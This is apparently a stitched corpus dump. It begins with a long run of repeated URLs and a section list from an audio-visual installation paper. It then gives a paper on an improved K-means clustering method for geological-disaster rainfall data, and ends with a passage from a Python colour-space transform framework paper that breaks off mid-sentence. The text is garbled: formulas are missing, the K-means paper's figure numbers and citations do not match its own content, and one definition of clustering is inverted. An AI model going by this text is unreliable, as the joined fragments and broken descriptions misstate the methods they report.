http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://www.nime.org/proceedings/2009/nime2009_286.pdf http://dx.doi.org/10.1109/MMUL.2010.44 http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.nime.org/proceedings/2007/nime2007_431.pdf http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://dx.doi.org/10.7717/peerj-cs.5 An interactive audio-visual installation using ubiquitous hardware and web-based software deployment Introduction Related Work Artistic Concept The Installation Movement detection Video rendering Musicological model Audio rendering Audience Feedback and Discussion Online Live Conclusion References work_psegqzocp5c6tdslpbvt6fmyre ---- 9 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Improved K-means Algorithm Based on optimizing Initial Cluster Centers and Its Application Xue Linyao, Wang Jianguo School of Computer Science and Engineering, Xi’an Technological University, Xi’an, 710032 China Email: xuelinyaoyao@foxmail.com Abstract. Data mining is a process of data grouping or partitioning from the large and complex data, and the clustering analysis is an important research field in data mining. The K-means algorithm is considered to be the most important unsupervised machine learning method in clustering, which can divide all the data into k subclasses that are very different from each other. By constantly iterating, the distance between each data object and the center of its subclass is minimized. Because K-means algorithm is simple and efficient, it is applied to data mining, knowledge discovery and other fields. However, the algorithm has its inherent shortcomings, such as the K value in the K-means algorithm needs to be given in advance; clustering results are highly dependent on the selection of initial clustering centers and so on. In order to adapt to the historical data clustering of the geological disaster monitoring system, this paper presents a method to optimize the initial clustering center and the method of isolating points. The experimental results show that the improved k-means algorithm is better than the traditional clustering in terms of accuracy and stability, and the experimental results are closer to the actual data distribution. Keywords: Clustering analysis, improved K-means algorithm, geological disaster monitoring data 1. Introduction The occurrence of geological disasters caused great casualties to humans, the main reasons include landslides and debris flow and rainfall and so on. And these geological disasters always cause many local public facilities to be damaged by large and small, and brought great damage to the people and their property. Also, there are still many such cases in China. Faced with such a severe threat of geological disasters, the state and the government on the prevention and control of geological disasters into a lot of human and material resources, and achieved remarkable results. With the progress of technology and high development of information technology, many new detection equipments have been put into the geological disaster real-time detection, such as GPS, secondary sound wave monitoring, radar and so on. With the development of geological hazard detection technology, the amount of the monitoring data grew by leaps and bounds, data types are becoming more and more complex as well. K-means algorithm is a clustering algorithm based on the classification of the classic algorithm, the algorithm in the industrial and commercial applications more widely. As we all know, it both has many advantages and many disadvantages. The research on the deficiency of K-means algorithm is divided into two branches: 1) the 10 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 number of initial clustering centers K; 2) the choice of initial clustering center. In this paper, we mainly study the latter, and propose a new initial clustering center algorithm. The data source of the study is the historical data detected by the geological disaster monitoring system, and 2000 records are randomly selected from the rainfall data of different areas in Shaanxi Province as the research object, which are served as a representative sample of the improved K-means clustering algorithm. The experimental results show that the algorithm is better than the traditional clustering in terms of accuracy and stability, and the experimental results are closer to the actual data distribution. 2. Brief and Research Status of K-Means Algorithm 2.1 Overview of K-means algorithm The K-means algorithm is a classical unsupervised clustering algorithm. The purpose is to divide a given data set containing N objects into K clusters so that the objects in the cluster are as similar as possible, and the objects between clusters are as similar as possible. Set the sample set X = {x1, x2, x3, ... xn}, n is the number of samples. The idea of the K-means algorithm is: Firstly, k data objects are randomly selected from the sample set X as the initial clustering center; Secondly, according to the degree of similarity between each data object and k clustering centers, it is allocated to the most similar clusters; Then recalculate the average of each new cluster and use it as the next iteration of the clustering center, and repeat the process until the updated cluster center is consistent with the update, that is, the criterion function E converges. Figure.1 K-means flow The goal is to make the object similarity in the cluster the largest, and the similarity between the objects is the smallest. The degree of similarity between the data can be determined by calculating the Euclidean distance between the data. For the n-dimensional real vector space, the Euclidean distance of two points is defined as: Improved K-means Algorithm Based on optimizing Initial Cluster Centers and Its Application 11 d(x, y)= （1） Here, x_i and y_i are the attribute values of x and y respectively, and the criterion function is defined as: E = （2） Here, k is the total number of clusters, and is the center of cluster c. The flow of K-means algorithm is shown in Figure 1. 2.2 Research status quo of K-means algorithm For the advantages of K-means algorithm, it has been widely used in practice, but there are many shortcomings as well. In order to get better clustering effect, many researchers have explored the shortcomings of improving K-means. Aiming at the shortcomings of K-means algorithm in selecting the initial point, many scholars have proposed an improved method. Duan Guiqin [1] uses the method of product based on mean and maximum distance to optimize the initial clustering center. The algorithm first selects the set of data objects which are the farthest from the sample set to join the clustering center, and then the set of mean and current poly The largest data object of the class center is added to the clustering center set, which improves the accuracy. Yi Baolin [2] et al. proposed another improved K-means algorithm, which first calculates the density of the region to which the data object belongs, and then selects k points as the initial center in the high density region. The experimental results show that the algorithm reduces the initial center point Impact. Yiu-Ming Cheng[3] and others proposed a new clustering technique called K * -means algorithm. The algorithm consists of two separate steps. A center point is provided for each cluster in the first step; and then adjust the unit through adaptive learning rules in the second step. The algorithm overcomes the shortcomings of K-means algorithm initial center sensitivity and K value blindness, but the calculation is complicated. Xie and others [4] proposed a k-means algorithm to optimize the initial clustering center by using the minimum variance based on the sample space distribution compactness information. The algorithm chooses the samples with the smallest variance and a distance away from each other as the initial clustering center. Liu Jiaxing et al.[5] proposed a radius-based k-means + λ algorithm. When selecting the initial center point of the cluster, the distance ratio between points is calculated from the λ parameter and rounded at a specific distance. In the circle, an initialized center point is selected according to the distance ratio, and the algorithm has higher performance in error rate and operation time. Ren Jiangtao[6] proposed an improved K-means algorithm for text clustering, which is improved by using feature selection and dimension reduction, sparse vector selection, initial center point search based on density and spreading, Class accuracy, stability and other aspects have improved. 2.3 The analysis of shortcomings of K-means algorithm 1) The K value in the K-means algorithm needs to be given in advance. According to the K value determined in advance, the clustering samples are classified into K class, so that the sum of squares of all the samples in the clustering domain to the clustering center is minimized. 2) Clustering results are highly dependent on the selection of initial clustering centers. The K-means algorithm uses the stochastic method to select the initial clustering center. If the initial clustering center is chosen improperly, it is difficult to obtain the ideal clustering effect. This dependence on the initial value may lead to the instability of the clustering results, and it is easy to fall into the local optimal rather than the global optimal results. 12 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 3) Sensitive to noise and isolated points. 3. Improvement of K-Means Algorithm and Its Application 3.1 The selection of data object in Cluster analysis The preliminary data are collected firstly when data selecting, then know about the characteristics of data to identify the quality of the data and to find a basic observation of the data or assume the implied information to monitor the subset of data of interest. The data object segmentation variable determines the formation of clustering, which in turn affects the correct interpretation of the clustering results, and ultimately affects the stability of the clustering clusters after the new data objects are added. Before the K-means clustering related data mining, the sample data set related to the data mining clustering analysis should be extracted from the original data object set, and it is not necessary to use all the historical data. In addition, we should pay attention to the quality of data, only high-quality data to the correct analysis of conclusions everywhere, to provide a scientific basis for clustering. The source of this research object is the historical monitoring data of the geological disaster monitoring system. From the records of geological monitoring data from 2015 to 2016, a representative sample of K-means clustering algorithm for this improved algorithm is selected as the object of study in 2000, and the two samples of 3D rainfall are randomly selected in different regions. The sample data attributes show as table1: Table 1 The sample data attributes For the cluster analysis, there are obviously redundant ones in the data attributes of the above geological hazard monitoring system, and it does not have the objectivity of the cluster analysis data. Therefore, the redundant ones should be eliminated. Finally, only four data object attributes reflecting the characteristics of rainfall data are selected as the research object. The optimized data attributes show as table2: Field number Field name Field code Type of data 1 Id xx Number 2 Sno yy Varchar 3 Type type Varchar 4 Gettime time Datatime 5 Alarm Level alarm Integer 6 Value value Double 7 Day Value d_value Double Improved K-means Algorithm Based on optimizing Initial Cluster Centers and Its Application 13 Table 2 The optimized data attributes 3.2 Improvement of K-means algorithm For the above geological disaster monitoring system rainfall data characteristics, the K-means algorithm is very sensitive to the initialization center, and the initial clustering center is very easy to make the clustering result into the local optimum and the influence of the isolated point is large. The algorithm is based on the small cluster with the largest variance and can be divided into two clusters with different variance. The algorithm of initializing center is proposed. In addition, a method of isolating points has been proposed. The idea of this algorithm is to first find out the two points furthest from the sample point as the initial center point, and then divide the other sample points into the cluster to which the nearest center point belongs, and determine the number of points within the cluster And whether the corresponding initial clustering center is an isolated point, and finally select the next object to be split according to the variance within the cluster and update the initial cluster center according to certain rules. The above steps are repeated until the number of cluster centers is satisfied. 1) Initial clustering center selection algorithm X={x1,x2,x3…xn}, n is the number of samples. d (xi , xj ) (i, j ∈ {1,2 … n}) is the Euclidean distance between the data points xi and xj, ci (i ∈ 1,2…n} is the clustering center, Q is the data object that will be spited, S is the number of clustering centers. The initial clustering center selection algorithm is as follows: Input: data set X, number of clusters k, threshold u Output: cluster center set C and isolated point set D (1) Let Q=X={x1,x2,x3,……xn};S=0; (2) Calculate the Euclidean distance d (xi,xj) between the two data points in W, and find the two points xi,xj, which are marked as ci, cj, and let: S = S + 2; Qi = {xp | d(xp,xi)< d(xp,xj),xp ∈ Q}, Qj = {xp | d(xp,xj)< d(xp,xi),xp ∈ Q}, which means Q is divided by the cluster ,and Qi and Qj become the split clusters. (3) If the number of data objects in Qi or Qj is less than u, the selected initial center xi or xj is an isolated Field number Field name Field code Type of data 1 Id xx Number 2 Sno yy Varchar 3 Gettime time Datatime 4 Day Value d_value Double 14 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 point. Remove xi or xj from Q, remove ci or cj in set C, and add xi or xj to D, return to step 1; (4) If the number of data objects in the set C is less than k, find the set Qp with the largest variance in the splitting cluster and let Q=QpQp ，S=S-1, then remove cpcp the set C; (5) Calculate the mean of all the objects in the split cluster, and the resulting mean is k initial clustering centers. 2) Improved K-means algorithm Data set X={x1,x2,x3,……xn}, there are n objects. Cold,i represents the i-th cluster center of the previous round, Cnew,,i represents the new cluster center calculated in current time, and the algorithm is described as follows: Input: data set X, number of clusters k, threshold u Output: k clusters and the number of bands (1) Call the improved initialization center selection algorithm to get the initialization center, if there is an isolated point will be isolated points alone in a class, do not participate in the follow-up clustering algorithm; (2) Calculate the distance between all data objects and k cluster centers, and assign the text to the nearest cluster; (3) Calculate the mean of each cluster to obtain a new round of cluster center; (4) If E’= = , then the iteration is terminated, otherwise it returns to 2). (note: E’is the measure function) 4. Experiment Analysis 4.1 Experimental description The data set selected from the experiment comes from the rainfall data collected in the geological hazard detection system and the rainfall data set after the artificial noise is added. The experimental environment is: Inter(R)Core(TM)i3-2330M,4G RAM，250G hard disk，Win7 operating system. In order to verify the validity and stability of the improved algorithm, the original k-means algorithm, the algorithm in literature [4]and the improved algorithm are analyzed and compared under the rainfall data set. In order to further verify the superiority of the algorithm in dealing with isolated points, the algorithm is compared with other algorithms on the rainfall data set after adding noise. The clustering results are clustered and criterion function changes and the clustering time are used to evaluate the clustering results. 4.2 Experimental results and analysis The clustering criterion function of the two algorithms will decrease with the increase of the number of the adjustment of the cluster until the final convergence, and the more compact the two curves, the higher the accuracy of the corresponding clustering results The vice versa. Figure 2 is the comparison of the traditional k-means algorithm and the improved algorithm standard function values with the clustering cancroids adjustment and constantly changing the comparison chart.; In order to test the Improved K-means Algorithm Based on optimizing Initial Cluster Centers and Its Application 15 speed of the improved algorithm in this paper, three samples were randomly selected from the historical data of the geological hazard system, and the sample capacity was 5000，10000 and 18000 respectively. The experimental results are shown in Figure 3. Figure.2 The comparison of criterion function changes trend graph Figure.3 The comparison of clustering times in artificial data sets According to the comparison of criterion function change trend graph in the rainfall data set in Figure 6, the clustering criterion function of the improved algorithm is superior to the clustering criterion function value of the traditional k-means algorithm because the data objects in the optimized cluster are more compact and independent in each iteration process, the criterion function value is significantly lower than the traditional k-means algorithm, which also further validates the superiority of this algorithm; Figure7 shows that the traditional k-means algorithm is running at the fastest speed, and the speed of this algorithm is slightly lower than that of algorithm[4]. 5. Conclusion Aiming at the instability of the clustering results caused by the random clustering of the traditional k-means algorithm and the effect of the isolated points on the clustering results, the authors of this paper have the advantages of small distance from the large sample points to the same cluster The clustering algorithm with the largest variance of variance can be split into two clusters with relatively small variance, a k-means clustering algorithm is proposed to optimize the initial clustering center. Simulation experiments in geological hazard systems and artificial data sets with the same proportion of noise show that the proposed algorithm improves the accuracy and clustering error compared with the traditional k-means algorithm and the other two optimization initial center algorithms. However, the initial algorithm of the algorithm is somewhat complicated, and it takes too much time in the selection of the central problem. In the future work, it will be further improved, and it will be tried in all respects. 16 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 References [1] Zhai D H, Yu J，Gao F，et al. k-means text clustering algorithm based oninitial cluster centers selection according to maximum distance [J]. Application Research of Computers, 2014, 31(3):379 – 382. [2] Baolin Yi，Haiquan Qiao，Fan Yang，Chenwei Xu. An Improved Initialization Center Algorithm for K-Means Clustering[C]. Computational Intelligence and Software Engineering, 2010, pp:1-4. [3] Redmond S J, Heneghan C.A method for initializing the K-means clustering algorithm using kd-trees[J]. Pattern recognition letters，2007，28(8):965-973. [4] Liu J X , Zhu G H, Xi M. A k-means Algorithm based on the radius [J]. Journal of Guilin University of Electronic Technology，2013，33(2):134-138. [5] Habibpour R, Khalipour K. A new k-means and K-nearest-neighbor algorithms for text document clustering [J]. International Journal of Academic Research Part A, 2014, 6( 3) : 79 － 84． [6] Data mining techniques and applications – A decade review from 2000 to 2011[J] . Shu-Hsien Liao,Pei-Hui Chu, Pei-Yuan Hsiao. Expert Systems With Applications . 2012 (12) [7] Application of Improved K-Means Clustering Algorithm in Transit Data Collection. Ying Wu, Chun long Yao. 20103rd International Conference on Biomedical Engineering and Informatics (BMET). 2010. [8] Zhou A W, Yu Y F. The research about clustering algorithm of K-means [J]. Computer Technology and Development, 2011, 21(2):62-65. [9] Duan G Q. Auto generation cloud optimization based on genetic algorithm [J]. Computer and Digital Engineering, 2015, 43(3):379-382. [10] Wang C L, Zhang J X. Improved k-means algorithm based on latent Dirichlet allocation for text clustering [J]. Journal of Computer Applications,2014,34(1):249-254. [11] Deepa V K,Geetha J R R. Rapid development of applications in data mining[C]. Green High Performance Computing(ICGHPC),2013,pp:1-4. [12] Sharma S, Agrawal J, Agarwal S, et al. Machine learning techniques for data mining:A survey[C]. Computational Intelligence and Computing Research (ICCIC), 2013, pp:1-6. [13] Efficient Data Clustering Algorithms: Improvements over Kmeans[J] . Mohamed Abubaker, Wesam Ashour. International Journal of Intelligent Systems and Applications(IJISA) . 2013 (3). [14] Fahad A, Alshatri N, Tari Z, Alamri A. A Survey of Clustering Algorithms for Big Data: Taxonomy and Empirical Analysis[C]. Emerging Topics in Computing.2014:267-279. [15] Abubaker M, Ashour Wesam. Efficient data clustering algorithm algorithms: improvemwnts over k-means[J]. I nternational Journal of Intelligent Systems and Applications.2013(3):37-49. [16] Tang Zhaoxia, Zhang Hui. Improved K-means Clustering Algorithm Based on Genetic Algorithm[C], Telkomnika Indonesian Journal of Electrical Engineering.2014, pp:1917-1923. [17] Optimal variable weighting for ultrametric and additive tree clustering[J]. Geert Soete. Quality and Quantity . 1986 (2). work_ptbmdrtm2beztaoyct66zhkrme ---- Submitted 18 August 2015 Accepted 4 February 2016 Published 9 March 2016 Corresponding author Ivar Farup, ivar.farup@ntnu.no Academic editor Klara Kedem Additional Information and Declarations can be found on page 12 DOI 10.7717/peerj-cs.48 Copyright 2016 Farup Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A computational framework for colour metrics and colour space transforms Ivar Farup Faculty of Computer Science and Media Technology, Gjøvik University College, Norway ABSTRACT An object-oriented computational framework for the transformation of colour data and colour metric tensors is presented. The main idea of the design is to represent the transforms between spaces as compositions of objects from a class hierarchy providing the methods for both the transforms themselves and the corresponding Jacobian matrices. In this way, new colour spaces can be implemented on the fly by transforming from any existing colour space, and colour data in various formats as well as colour metric tensors and colour difference data can easily be transformed between the colour spaces. This reduces what normally requires several days of coding to a few lines of code without introducing a significant computational overhead. The framework is implemented in the Python programming language. Subjects Computer Vision, Graphics, Optimization Theory and Computation, Scientific Computing and Simulation, Software Engineering Keywords Colour metrics, Colour space, Transform, Object-oriented, Python INTRODUCTION Colour data such as measured colours, specified colours or pixels of colour images are most commonly described as sets of points in a three-dimensional space—a so-called colour space. Many different colour spaces are currently in use in various settings. For many applications, selecting the best colour space for processing the data can be crucial (Plataniotis & Venetsanopoulos, 2000). Converting between all the different colour spaces can be challenging. Different conventions for scaling and normalisation is used, and many of the colour spaces commonly in use are inaccurately defined. The complexity of conversion is particularly present for computations involving colour metric data, which, by nature, is tensorial (Deza & Deza, 2009), giving rise to the need for not only the direct transformations, but also the corresponding Jacobian matrices—a tedious and error-prone process (Pant & Farup, 2012). So far, no common framework for such transformations of colour data and metrics including the automated computation of Jacobian matrices has been constructed. From other fields of computational science, it is well established that object-oriented frameworks can be useful for simplifying such matters (Beall & Shephard, 1999). With the advent of modern high-level interpreted languages, the computational overhead is not nearly as high as before, and the ease of use has increased significantly (Cai, Langtangen & Moe, 2005). Thus, in order to simplify the matters for colour science and engineering, an object-oriented framework for colour space construction, and conversion of colour How to cite this article Farup (2016), A computational framework for colour metrics and colour space transforms. PeerJ Comput. Sci. 2:e48; DOI 10.7717/peerj-cs.48 https://peerj.com mailto:ivar.farup@ntnu.no https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.48 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.48 data and colour metric tensor data is designed. The framework is currently limited to three-dimensional colour spaces. Following the background material on the principles of transforming colour data and related tensorial data in the following section, the principles and ideas underlying the framework are presented. To demonstrate to which degree the framework simplifies the implementation of colour data and metric transformations, an implementation of the framework using the high-level programming language Python (Van Rossum & Drake, 1995) is applied to some standard example problems. BACKGROUND Transformation of colour data Transformations between different colour spaces can in general take the shape of a function, x̄ = x̄(x), where x = (x1,x2,x3)T represents a colour, i.e., a point in a colour space. Fortunately, most common colour space conversions are made up of a small set of relatively simple mathematical operations. The linear transformation is a very common ingredient in the transforms. Some colour spaces, such as, e.g., the CIECAT02 colour adaptation space (Moroney et al., 2002), are even defined simply by a linear transformation from some other colour space: x̄ =Ax, (1) where A is a 3×3 constant matrix. Combined with the so-called gamma correction, which is applied channel-wise, most RGB type colour spaces, and also, e.g., the IPT (Ebner & Fairchild, 1998) colour space can be construced x̄i=sgn(xi)|xi| γ , (2) where γ >0 is the constant exponent. For many perceptual colour spaces such as CIELAB, both Cartesian and cylindrical coordinates are commonly used for describing the chromatic plane. The transformation from Cartesian to polar is x̄1=x1, x̄2= √ x22 +x 2 3, x̄3=atan2(x3,x2), (3) with the corresponding inverse transform x̄1=x1, x̄2=x2cos(x3), x̄3=x2sin(x3). (4) Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 2/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.48 Chromaticities and luminances are often represented in projective spaces such as xyY, x̄1= x1 x1+x2+x3 , x̄2= x2 x1+x2+x3 , x̄3=x2. (5) Colour spaces used for colour metrics such as 1EE (Oleari, Melgosa & Huertas, 2009) and the various DIN99 metrics (Cui et al., 2002) often include a logarithmic compression of some or all of the channels such as lightness and chroma (radius in polar coordinates): x̄i=ailn(1+bixi), (6) where ai and bi are the parameters of the transform. Recently, the Poincaré disk representation of the hyperbolic plane has been used for representing the chromatic plane (Lenz, Carmona & Meer, 2007; Farup, 2014). The chroma-preserving mapping to the Poincaré disk can be written as a mapping of the radius in polar coordinates as x̄2= tanh ( x2 2R ) , (7) where R>0 is the radius of curvature. Besides these more generic transformations, various non-linear transformation functions specific to individual colour spaces are used in such cases as sRGB, CIELAB, CIELUV, the underlying colour space of the CIEDE2000 metric, etc. Transformation of tensorial data Most colour metrics can be represented in the form of a line element, or a differential quadratic form (Wyszecki & Stiles, 1982, Chapter 8.4), as ds2=dxT Gdx. (8) Here, G is the metric tensor—a function of the coordinates. For metrics defined as Euclidean distances in a given colour space, the metric tensor is the identity tensor, I, in the given space. Some colour metrics, like, e.g., CIEDE2000, cannot be written in this form, but can be linearised—or Riemannised—to a good approximation (Pant & Farup, 2012). Under a coordinate transformation, x̄ = x̄(x), this metric transforms according to ds2=dxT Gdx =dx̄T ∂x ∂x̄ T G ∂x ∂x̄ dx̄ =dx̄T Ḡdx̄, (9) where∂x/∂x̄ is the Jacobian matrix of the coordinate transform with componentns∂xi/∂x̄j. In other words, the metric tensor transforms according to Ḡ= ∂x ∂x̄ T G ∂x ∂x̄ . (10) Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 3/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.48 Under composition of several coordinate transformations, x̃ = x̃(x̄)= x̃(x̄(x)), the process is nested, ds2=dx̃T ∂x̄ ∂x̃ T ∂x ∂x̄ T G ∂x ∂x̄ ∂x̄ ∂x̃ dx̃, (11) G̃= ∂x̄ ∂x̃ T ∂x ∂x̄ T G ∂x ∂x̄ ∂x̄ ∂x̃ , (12) which can also be seen directly from the chain rule for the Jacobian matrices, ∂x ∂x̃ = ∂x ∂x̄ ∂x̄ ∂x̃ . (13) All the points with unit distance from a given central point—a unit ball—constitute an ellipsoid 1xT G1x =1. (14) The cross section of this ellipsoid with a principal plane in a given coordinate is obtained by setting the corresponding 1xi =0, reducing the ellipsoid to an ellipsis (Pant & Farup, 2012), ( 1x1 1x2 )(g11 g12 g21 g22 )( 1x1 1x2 ) =1, (15) with angle θ and semi-axes a and b given by tan(2θ)= 2g12 g11−g22 , (16) a= 1√ g22+g12cotθ , (17) b= 1√ g11−g12cotθ . (18) SYSTEM ARCHITECTURE Since the computation of generic colour space transforms and, in partiular the composition of their Jacobian matrices can be a tedious and error-prone process (see, e.g., Pant & Farup, 2012), an object-oriented framework for transforming colour and metric data between colour spaces has been implemented as a Python package colour. The package consists of six partially interdependent modules space, data, metric, tensor, statistics and misc. The relationship between the modules is shown in Fig. 1. In the figure, the arrows indicate dependencies between the modules in the form of Python imports. Each of the modules contain functions, classes and predefined objects with the purpose of simplifying the implementation of new colour spaces and metrics. Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 4/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.48 Figure 1 Structure of the modules within the colour package. The arrows indicate dependencies in the form of Python imports. Representing colour spaces The core functionality of the colour space and colour metric transforms is found in the space module. The basic idea in designing the object oriented framework is to realise a colour space as an object, and to facilitate the construction of new such objects by providing classes for transforming new colour spaces from already existing ones. The class hierarchy which constistutes the core of the of the module, is shown in Fig. 2. All boxes represent classes, and the arrows denote class inheritance. Italicized method names indicate methods that should be overridden in a subclass. Details about attributes and auxiliary methods etc. have been left out for readability. All colour space objects must derive from the abstract Space class, and as such implement the methods to_XYZ and from_XYZ for converting colour data between the XYZ colour space and the colour space represented by the object, and the methods jacobian_XYZ and inv_jacobian_XYZ for computing the corresponding Jacobian matrix and its inverse. The two latter methods are implemented in Space as inverses of each other, so the subclasses only need to implement one of them—the other one can be inherited. The colour data is represented as N ×3 NumPy (Oliphant, 2007) ndarrays, and the Jacobian matrices as N ×3×3 ndarrays. All transformations between colour spaces must go through XYZ, which thus serves a special role, and has a separate class of its own. Here, the transformations are simply the identity transform, and the Jacobian matrices are identity matrices. All other colour spaces Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 5/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.48 Figure 2 Structure of the classes within the space module. Data types and parameters are not shown for the derived methods. will be built by transforming colour data from an already existing colour space, starting from XYZ. To facilitate making the specific transforms, an abstract class Transform is provided. During instantiation of a transformed colour space object, the base space of the transformation has to be set. The virtual methods to_base and from_base for converting colour data to and from the base base, and jacobian_base and inv_jacobian_base for computing the Jacobian matrix and its inverse between the current space and the base space must be provided in the derived classes. The methods to_XYZ, from_XYZ, jacobian_XYZ, and inv_jacobian_XYZ are implemented in the base class Transform using the transformation between the current space and the base space (provided by derived classes) and the corresponding transformations in the base class, see Eq. (12). Hence, there is no need to reimplement these in the derived classes. Finally, the concrete colour space tranforms are implemented as classes TransformXXX derived from Transform. They must all implement the methods to_base, from_base and either jacobian_base or inv_jacobian_base. The remaining methods will be inferred by inheritance. In some cases, though, it is more efficient to provide more methods in order to reduce the computational cost. For example, in TransformLinear, both methods jacobian_base and inv_jacobian_base are provided in order to avoid inverting every single Jacobian matrix for large data sets. Representing colour and metric data The colour space objects constructed by the method described above, will convert colour data represented as N ×3 ndarrays (N colour data points). For real-life applications, colours some times come as single data points (3-vectors), some times as lists of colour data (N ×3 matrices), and some times as images (M ×N ×3 arrays). In order for the Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 6/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.48 Figure 3 The Data and TensorData classes for keeping track of colour data and metric data, respec- tively. user not having to deal with converting back and forth between these formats, as well as remembering in which colour space all the data is given, a separate class Data for storing colour data has been implemented as part of the data module, cf. Fig. 3. Again, the boxes denote classes. In this module, there are no inheritance relationship between the classes, but they are related by the TensorData class having an attribute of the Data type. A colour Data object can be instantiated with single colour data, lists of colour data, or colour images in any implemented colour space. The Data object takes the colour space (object) of the data as an argument, and keeps a dictionary of the colour spaces in which the data in question has been computed. When the colour data in a given space is requested (using the get method), it first checks the dictionary whether it has already been computed. If not, it is computed, stored in the dictionary and returned. All the actual computations are taken care of by the hierarcy of colour space objects representing the transforms necessary for building the colour space. A similar approach is taken for colour metric data in the form of colour tensors, see Fig. 3. In this case, both the locations of the colour metrics (as colour Data), and the metrics themselves are represented in the class. Like for the colour data, a dictionary of the computed tensors is maintained. For the conversion between the different colour spaces, the Jacobian matrices are applied according to Eq. (10). The nested tensor transforms, Eq. (12), are implicitly taken care 